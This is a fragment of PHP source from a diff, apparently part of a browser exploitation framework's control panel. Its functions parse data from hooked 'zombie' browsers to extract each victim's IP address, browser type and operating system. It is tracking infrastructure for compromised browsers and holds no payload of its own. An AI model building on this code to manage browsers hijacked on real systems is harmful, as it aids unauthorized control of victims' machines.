$zombie_data['os_image'] = extract_zombie_os($browser_details);
return $zombie_data;
}
// ---[ EXTRACT_ZOMBIE_IP
function extract_zombie_ip($raw_zombie_data) {
// get ip address from data
return substr("$raw_zombie_data",0,strpos($raw_zombie_data,"\n")+strlen("\n"));
}
// ---[ EXTRACT_ZOMBIE_USERAGENT
function extract_zombie_useragent($raw_zombie_data) {
// find agent type
if(stristr($raw_zombie_data, AGENT_FIREFOX_UA_STR)) {
return AGENT_FIREFOX_IMG;
}
if(stristr($raw_zombie_data, AGENT_IE_UA_STR)) {
return AGENT_IE_IMG;
}
if(stristr($raw_zombie_data, AGENT_CHROME_UA_STR)) {
return AGENT_CHROME_IMG;
}
if(stristr($raw_zombie_data, AGENT_SAFARI_UA_STR)) {
return AGENT_SAFARI_IMG;
}
if(stristr($raw_zombie_data, AGENT_KONQ_UA_STR)) {
return AGENT_KONQ_IMG;
}
if(stristr($raw_zombie_data, AGENT_MOZILLA_UA_STR)) {
return AGENT_MOZILLA_IMG;
}
return AGENT_UNKNOWN_IMG;
}
// ---[ EXTRACT_ZOMBIE_OS
function extract_zombie_os($raw_zombie_data) {
// find os type
if(stristr($raw_zombie_data, OS_WINDOWS_UA_STR)) {
return OS_WINDOWS_IMG;
}
if(stristr($raw_zombie_data, OS_LINUX_UA_STR)) {
return OS_LINUX_IMG;
}
if(stristr($raw_zombie_data, OS_MAC_UA_STR)) {
return OS_MAC_IMG;
}
return OS_UNKNOWN_IMG;
}
?>

3718
include/xmlrpc.inc.php Normal file
View File

File diff suppressed because it is too large Load Diff